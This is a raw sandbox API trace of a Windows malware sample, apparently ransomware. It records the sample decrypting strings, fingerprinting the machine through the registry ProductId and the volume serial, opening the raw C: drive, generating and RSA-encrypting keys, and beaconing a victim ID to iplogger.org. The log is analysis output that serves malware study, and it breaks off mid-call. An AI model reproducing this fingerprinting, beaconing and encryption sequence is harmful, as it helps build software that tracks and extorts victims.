[0150.043] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x11) returned 0x549358 [0150.043] GetProcessHeap () returned 0x520000 [0150.043] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x11) returned 0x548f38 [0150.044] GetProcessHeap () returned 0x520000 [0150.044] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x3f4ec50 [0150.044] GetProcessHeap () returned 0x520000 [0150.044] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x548f18 [0150.044] GetProcessHeap () returned 0x520000 [0150.044] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x11) returned 0x549078 [0150.044] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x758d0000 [0150.044] GetProcAddress (hModule=0x758d0000, lpProcName="HttpOpenRequestA") returned 0x758f4c7d [0150.044] GetProcAddress (hModule=0x758d0000, lpProcName="HttpSendRequestA") returned 0x759618f8 [0150.044] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0150.045] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0150.045] GetProcAddress (hModule=0x758d0000, lpProcName="InternetConnectA") returned 0x758f49e9 [0150.045] GetProcessHeap () returned 0x520000 [0150.045] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5809e0 | out: hHeap=0x520000) returned 1 [0150.045] GetProcessHeap () returned 0x520000 [0150.045] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f4ec38 | out: hHeap=0x520000) returned 1 [0150.045] GetProcessHeap () returned 0x520000 [0150.045] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x549358 | out: hHeap=0x520000) returned 1 [0150.045] GetProcessHeap () returned 0x520000 [0150.045] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x548f38 | out: hHeap=0x520000) returned 1 [0150.045] GetProcessHeap () returned 0x520000 [0150.045] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f4ec50 | out: hHeap=0x520000) returned 1 [0150.045] GetProcessHeap () returned 0x520000 [0150.045] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x548f18 | out: hHeap=0x520000) returned 1 [0150.045] GetProcessHeap () returned 0x520000 [0150.045] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x549078 | out: hHeap=0x520000) returned 1 [0150.045] GetProcessHeap () returned 0x520000 [0150.045] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x548f58 | out: hHeap=0x520000) returned 1 [0150.045] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0150.045] InternetConnectA (hInternet=0xcc0004, lpszServerName="iplogger.org", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0150.045] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/13ySq7", lpszVersion=0x0, lpszReferrer="4B2E4630;0.00", lplpszAcceptTypes=0x0, dwFlags=0x80800000, dwContext=0x0) returned 0xcc000c [0150.045] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0150.074] GetLastError () returned 0x2 [0150.074] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0150.074] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0150.075] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0150.075] GetProcessHeap () returned 0x520000 [0150.075] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f16530 | out: hHeap=0x520000) returned 1 [0150.075] GetProcessHeap () returned 0x520000 [0150.075] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f16c60 | out: hHeap=0x520000) returned 1 [0150.075] GetProcessHeap () returned 0x520000 [0150.075] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1318 | out: hHeap=0x520000) returned 1 [0153.208] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x405700, lpParameter=0x1, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f8 [0153.209] SetTimer (hWnd=0x5011c, nIDEvent=0x1, uElapse=0x32, lpTimerFunc=0x0) returned 0x1 [0153.209] SetTimer (hWnd=0x5011c, nIDEvent=0x2, uElapse=0x3a98, lpTimerFunc=0x0) returned 0x2 [0153.209] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5fc [0153.209] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1001) returned 0x4011e [0153.209] EnableWindow (hWnd=0x4011e, bEnable=0) returned 0 [0153.211] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1003) returned 0x50114 [0153.211] EnableWindow (hWnd=0x50114, bEnable=0) returned 0 [0153.212] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1002) returned 0x50116 [0153.212] EnableWindow (hWnd=0x50116, bEnable=1) returned 1 [0153.212] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1008) returned 0x16026e [0153.212] EnableWindow (hWnd=0x16026e, bEnable=0) returned 0 [0153.213] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1010) returned 0x202a4 [0153.213] EnableWindow (hWnd=0x202a4, bEnable=0) returned 0 [0153.214] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1012) returned 0x20276 [0153.214] EnableWindow (hWnd=0x20276, bEnable=0) returned 0 [0153.215] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1009) returned 0x20274 [0153.215] EnableWindow (hWnd=0x20274, bEnable=0) returned 0 [0153.237] CloseHandle (hObject=0x5f8) returned 1 [0153.237] KillTimer (hWnd=0x5011c, uIDEvent=0x1) returned 1 [0153.237] KillTimer (hWnd=0x5011c, uIDEvent=0x2) returned 1 [0153.237] CloseHandle (hObject=0x5fc) returned 1 [0153.237] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1001) returned 0x4011e [0153.237] EnableWindow (hWnd=0x4011e, bEnable=1) returned 1 [0153.238] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1003) returned 0x50114 [0153.238] EnableWindow (hWnd=0x50114, bEnable=1) returned 1 [0153.239] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1002) returned 0x50116 [0153.239] EnableWindow (hWnd=0x50116, bEnable=0) returned 0 [0153.239] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1008) returned 0x16026e [0153.239] EnableWindow (hWnd=0x16026e, bEnable=1) returned 1 [0153.240] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1010) returned 0x202a4 [0153.240] EnableWindow (hWnd=0x202a4, bEnable=1) returned 1 [0153.240] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1012) returned 0x20276 [0153.240] EnableWindow (hWnd=0x20276, bEnable=1) returned 1 [0153.241] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1009) returned 0x20274 [0153.241] EnableWindow (hWnd=0x20274, bEnable=1) returned 1 [0153.241] wsprintfW (in: param_1=0x18f3f0, param_2="1. ID: %08X\r\n2. %s\r\n" | out: param_1="1. ID: 4B2E4630\r\n2. admin\r\n") returned 27 [0153.241] wsprintfW (in: param_1=0x18eb90, param_2="%s (%08X)%c %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="C: (9C354B42)L 0.00 gb (44)/0.00 gb (44)/100%\r\n") returned 47 [0153.241] wsprintfW (in: param_1=0x18f3f0, param_2="3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="3. Total: 0.00 gb (44)/0.00 gb (44)/100%\r\n") returned 42 [0153.241] wsprintfW (in: param_1=0x18eb90, param_2="%s (%08X)%c %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="C: (9C354B42)L 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 43 [0153.241] wsprintfW (in: param_1=0x18f3f0, param_2="3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 38 [0153.241] wsprintfW (in: param_1=0x18eb90, param_2="%s (%08X)%c %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="C: (9C354B42)L 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 43 [0153.241] wsprintfW (in: param_1=0x18f3f0, param_2="3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%\r\n" | out: param_1="3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 38 [0153.242] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1005) returned 0x4015e [0153.242] SetWindowTextW (hWnd=0x4015e, lpString="1. ID: 4B2E4630\r\n2. admin\r\n--------------------\r\n3. Total: 0.00 gb (44)/0.00 gb (44)/100%\r\nC: (9C354B42)L 0.00 gb (44)/0.00 gb (44)/100%\r\n--------------------\r\n3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\nC: (9C354B42)L 0.00 gb (0)/0.00 gb (0)/0%\r\n--------------------\r\n3. Total: 0.00 gb (0)/0.00 gb (0)/0%\r\nC: (9C354B42)L 0.00 gb (0)/0.00 gb (0)/0%\r\n") returned 1 [0153.243] GetDlgItem (hDlg=0x5011c, nIDDlgItem=1004) returned 0x80162 [0153.243] SetWindowTextA (hWnd=0x80162, lpString="finished") returned 1 [0153.243] GetProcessHeap () returned 0x520000 [0153.243] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x5a1318 [0153.244] CryptImportKey (in: hProv=0x534c10, pbData=0x18f758, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0153.244] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5a1318, pdwDataLen=0x18f7d4 | out: pbData=0x5a1318, pdwDataLen=0x18f7d4) returned 1 [0153.244] CryptDestroyKey (hKey=0x3f43588) returned 1 [0153.244] wsprintfA (in: param_1=0x18f7f0, param_2="%08X;%I64d.%02I64d" | out: param_1="4B2E4630;0.00") returned 13 [0153.244] GetProcessHeap () returned 0x520000 [0153.244] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x3f16c60 [0153.244] CryptImportKey (in: hProv=0x534c10, pbData=0x18f758, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0153.244] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f16c60, pdwDataLen=0x18f7d4 | out: pbData=0x3f16c60, pdwDataLen=0x18f7d4) returned 1 [0153.244] CryptDestroyKey (hKey=0x3f43588) returned 1 [0153.244] GetProcessHeap () returned 0x520000 [0153.244] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x3f16530 [0153.244] CryptImportKey (in: hProv=0x534c10, pbData=0x18f758, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0153.244] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f16530, pdwDataLen=0x18f7d4 | out: pbData=0x3f16530, pdwDataLen=0x18f7d4) returned 1 [0153.244] CryptDestroyKey (hKey=0x3f43588) returned 1 [0153.244] GetProcessHeap () returned 0x520000 [0153.244] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x580af0 [0153.244] CryptImportKey (in: hProv=0x534c10, pbData=0x18f758, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x3f43588) returned 1 [0153.244] CryptDecrypt (in: hKey=0x3f43588, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x580af0, pdwDataLen=0x18f7d4 | out: pbData=0x580af0, pdwDataLen=0x18f7d4) returned 1 [0153.244] CryptDestroyKey (hKey=0x3f43588) returned 1 [0153.244] GetProcessHeap () returned 0x520000 [0153.244] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x548f18 [0153.244] GetProcessHeap () returned 0x520000 [0153.244] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x3f4ec50 [0153.244] GetProcessHeap () returned 0x520000 [0153.244] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x11) returned 0x549078 [0153.244] GetProcessHeap () returned 0x520000 [0153.244] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x11) returned 0x548f58 [0153.244] GetProcessHeap () returned 0x520000 [0153.244] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x3f4ec38 [0153.244] GetProcessHeap () returned 0x520000 [0153.244] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x548f38 [0153.245] GetProcessHeap () returned 0x520000 [0153.245] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x11) returned 0x549338 [0153.245] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x758d0000 [0153.245] GetProcAddress (hModule=0x758d0000, lpProcName="HttpOpenRequestA") returned 0x758f4c7d [0153.245] GetProcAddress (hModule=0x758d0000, lpProcName="HttpSendRequestA") returned 0x759618f8 [0153.245] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0153.246] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0153.246] GetProcAddress (hModule=0x758d0000, lpProcName="InternetConnectA") returned 0x758f49e9 [0153.246] GetProcessHeap () returned 0x520000 [0153.246] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x580af0 | out: hHeap=0x520000) returned 1 [0153.246] GetProcessHeap () returned 0x520000 [0153.246] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f4ec50 | out: hHeap=0x520000) returned 1 [0153.246] GetProcessHeap () returned 0x520000 [0153.246] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x549078 | out: hHeap=0x520000) returned 1 [0153.246] GetProcessHeap () returned 0x520000 [0153.246] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x548f58 | out: hHeap=0x520000) returned 1 [0153.246] GetProcessHeap () returned 0x520000 [0153.246] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f4ec38 | out: hHeap=0x520000) returned 1 [0153.246] GetProcessHeap () returned 0x520000 [0153.246] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x548f38 | out: hHeap=0x520000) returned 1 [0153.246] GetProcessHeap () returned 0x520000 [0153.246] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x549338 | out: hHeap=0x520000) returned 1 [0153.246] GetProcessHeap () returned 0x520000 [0153.246] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x548f18 | out: hHeap=0x520000) returned 1 [0153.246] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0153.247] InternetConnectA (hInternet=0xcc0004, lpszServerName="iplogger.org", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0153.247] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/13ySq7", lpszVersion=0x0, lpszReferrer="4B2E4630;0.00", lplpszAcceptTypes=0x0, dwFlags=0x80800000, dwContext=0x0) returned 0xcc000c [0153.247] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0153.279] GetLastError () returned 0x2 [0153.279] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0153.280] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0153.280] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0153.280] GetProcessHeap () returned 0x520000 [0153.280] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f16c60 | out: hHeap=0x520000) returned 1 [0153.280] GetProcessHeap () returned 0x520000 [0153.280] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f16530 | out: hHeap=0x520000) returned 1 [0153.280] GetProcessHeap () returned 0x520000 [0153.280] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5a1318 | out: hHeap=0x520000) returned 1 Thread: id = 2 os_tid = 0x7f4 [0062.759] GetProcessHeap () returned 0x520000 [0062.760] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544398 [0062.760] GetProcessHeap () returned 0x520000 [0062.760] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x5354f8 [0062.760] GetProcessHeap () returned 0x520000 [0062.760] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x544780 [0062.760] CryptImportKey (in: hProv=0x534c10, pbData=0x71fed0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x5433d8) returned 1 [0062.760] CryptDecrypt (in: hKey=0x5433d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544780, pdwDataLen=0x71ff3c | out: pbData=0x544780, pdwDataLen=0x71ff3c) returned 1 [0062.760] CryptDestroyKey (hKey=0x5433d8) returned 1 [0062.760] GetProcessHeap () returned 0x520000 [0062.760] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x544808 [0062.760] CryptImportKey (in: hProv=0x534c10, pbData=0x71fed0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x5433d8) returned 1 [0062.760] CryptDecrypt (in: hKey=0x5433d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544808, pdwDataLen=0x71ff3c | out: pbData=0x544808, pdwDataLen=0x71ff3c) returned 1 [0062.760] CryptDestroyKey (hKey=0x5433d8) returned 1 [0062.760] SetErrorMode (uMode=0x1) returned 0x0 [0062.761] GetLogicalDrives () returned 0x4 [0062.761] GetProcessHeap () returned 0x520000 [0062.761] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535540 [0062.761] CryptImportKey (in: hProv=0x534c10, pbData=0x71fa48, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x5433d8) returned 1 [0062.761] CryptDecrypt (in: hKey=0x5433d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535540, pdwDataLen=0x71fab8 | out: pbData=0x535540, pdwDataLen=0x71fab8) returned 1 [0062.761] CryptDestroyKey (hKey=0x5433d8) returned 1 [0062.761] GetProcessHeap () returned 0x520000 [0062.761] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x53c350 [0062.761] CryptImportKey (in: hProv=0x534c10, pbData=0x71fa48, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x5433d8) returned 1 [0062.761] CryptDecrypt (in: hKey=0x5433d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53c350, pdwDataLen=0x71fab8 | out: pbData=0x53c350, pdwDataLen=0x71fab8) returned 1 [0062.761] CryptDestroyKey (hKey=0x5433d8) returned 1 [0062.761] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x71fab4 | out: phkResult=0x71fab4*=0x11c) returned 0x0 [0062.761] RegQueryValueExA (in: hKey=0x11c, lpValueName="ProductId", lpReserved=0x0, lpType=0x0, lpData=0x71fac0, lpcbData=0x71fabc*=0x400 | out: lpType=0x0, lpData=0x71fac0*=0x30, lpcbData=0x71fabc*=0x18) returned 0x0 [0062.761] RegCloseKey (hKey=0x11c) returned 0x0 [0062.761] GetProcessHeap () returned 0x520000 [0062.761] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535540 | out: hHeap=0x520000) returned 1 [0062.761] GetProcessHeap () returned 0x520000 [0062.761] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c350 | out: hHeap=0x520000) returned 1 [0062.762] GetProcessHeap () returned 0x520000 [0062.762] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x53c350 [0062.762] CryptImportKey (in: hProv=0x534c10, pbData=0x71f828, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x5433d8) returned 1 [0062.762] CryptDecrypt (in: hKey=0x5433d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53c350, pdwDataLen=0x71f88c | out: pbData=0x53c350, pdwDataLen=0x71f88c) returned 1 [0062.762] CryptDestroyKey (hKey=0x5433d8) returned 1 [0062.762] GetEnvironmentVariableW (in: lpName="SystemDrive", lpBuffer=0x71f890, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0062.762] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x71f888, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x71f888*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0062.762] GetProcessHeap () returned 0x520000 [0062.762] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c350 | out: hHeap=0x520000) returned 1 [0062.762] wsprintfA (in: param_1=0x71fad7, param_2="-%08X" | out: param_1="-9C354B42") returned 9 [0062.762] wsprintfW (in: param_1=0x71fee8, param_2="\\\\.\\%c:" | out: param_1="\\\\.\\C:") returned 6 [0062.762] wsprintfW (in: param_1=0x71fef8, param_2="%c:\\" | out: param_1="C:\\") returned 3 [0062.762] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0062.762] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x71fed8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x71fed8*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0062.763] GetProcessHeap () returned 0x520000 [0062.763] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x34) returned 0x5433d8 [0062.763] wsprintfW (in: param_1=0x5433d8, param_2="%c:" | out: param_1="C:") returned 2 [0062.763] CreateFileW (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0062.763] DeviceIoControl (in: hDevice=0x11c, dwIoControlCode=0x560000, lpInBuffer=0x0, nInBufferSize=0x0, lpOutBuffer=0x71ff08, nOutBufferSize=0x20, lpBytesReturned=0x71fedc, lpOverlapped=0x0 | out: lpOutBuffer=0x71ff08*, lpBytesReturned=0x71fedc*=0x20, lpOverlapped=0x0) returned 1 [0062.764] CloseHandle (hObject=0x11c) returned 1 [0062.764] GetProcessHeap () returned 0x520000 [0062.764] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5443a8 [0062.764] GetProcessHeap () returned 0x520000 [0062.764] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2c) returned 0x544890 [0062.764] CryptGenRandom (in: hProv=0x534c10, dwLen=0x20, pbBuffer=0x54489c | out: pbBuffer=0x54489c) returned 1 [0062.764] GetProcessHeap () returned 0x520000 [0062.764] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2c) returned 0x544958 [0062.764] CryptGenRandom (in: hProv=0x534c10, dwLen=0x20, pbBuffer=0x544964 | out: pbBuffer=0x544964) returned 1 [0062.764] GetProcessHeap () returned 0x520000 [0062.764] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x53c350 [0062.764] CryptImportKey (in: hProv=0x534c10, pbData=0x71fec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x544990) returned 1 [0062.764] CryptDecrypt (in: hKey=0x544990, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53c350, pdwDataLen=0x71ff30 | out: pbData=0x53c350, pdwDataLen=0x71ff30) returned 1 [0062.764] CryptDestroyKey (hKey=0x544990) returned 1 [0062.764] GetProcessHeap () returned 0x520000 [0062.764] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x544990 [0062.764] GetProcessHeap () returned 0x520000 [0062.764] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x80) returned 0x544a18 [0062.764] CryptImportKey (in: hProv=0x534c10, pbData=0x536998, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0x71ff10 | out: phKey=0x71ff10*=0x544aa0) returned 1 [0062.764] CryptEncrypt (in: hKey=0x544aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544990*, pdwDataLen=0x71ff14*=0x75, dwBufLen=0x80 | out: pbData=0x544990*, pdwDataLen=0x71ff14*=0x80) returned 1 [0062.765] CryptDestroyKey (hKey=0x544aa0) returned 1 [0062.765] CryptImportKey (in: hProv=0x534c10, pbData=0x536998, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0x71ff10 | out: phKey=0x71ff10*=0x544aa0) returned 1 [0062.765] CryptEncrypt (in: hKey=0x544aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544a18*, pdwDataLen=0x71ff14*=0x75, dwBufLen=0x80 | out: pbData=0x544a18*, pdwDataLen=0x71ff14*=0x80) returned 1 [0062.765] CryptDestroyKey (hKey=0x544aa0) returned 1 [0062.765] GetProcessHeap () returned 0x520000 [0062.765] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c350 | out: hHeap=0x520000) returned 1 [0062.765] GetProcessHeap () returned 0x520000 [0062.765] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa0) returned 0x544aa0 [0062.765] CryptImportKey (in: hProv=0x534c10, pbData=0x71feb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x544b48) returned 1 [0062.765] CryptDecrypt (in: hKey=0x544b48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0, pdwDataLen=0x71ff20 | out: pbData=0x544aa0, pdwDataLen=0x71ff20) returned 1 [0062.765] CryptDestroyKey (hKey=0x544b48) returned 1 [0062.765] GetProcessHeap () returned 0x520000 [0062.765] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1c) returned 0x53c350 [0062.765] GetProcessHeap () returned 0x520000 [0062.765] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x544b60 [0062.765] GetProcessHeap () returned 0x520000 [0062.765] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x544b78 [0062.765] GetProcessHeap () returned 0x520000 [0062.765] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x19) returned 0x53c378 [0062.766] GetProcessHeap () returned 0x520000 [0062.766] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x544b90 [0062.766] GetProcessHeap () returned 0x520000 [0062.766] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xd) returned 0x544ba8 [0062.766] GetProcessHeap () returned 0x520000 [0062.766] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x53c3a0 [0062.766] GetProcessHeap () returned 0x520000 [0062.766] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1b) returned 0x53c3c8 [0062.766] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0062.766] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryObject") returned 0x77c5f9e8 [0062.766] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0062.767] GetProcAddress (hModule=0x77c40000, lpProcName="NtQuerySystemInformation") returned 0x77c5fda0 [0062.767] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0062.767] GetProcAddress (hModule=0x77c40000, lpProcName="RtlGetVersion") returned 0x77c7873a [0062.767] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x76d30000 [0062.767] GetProcAddress 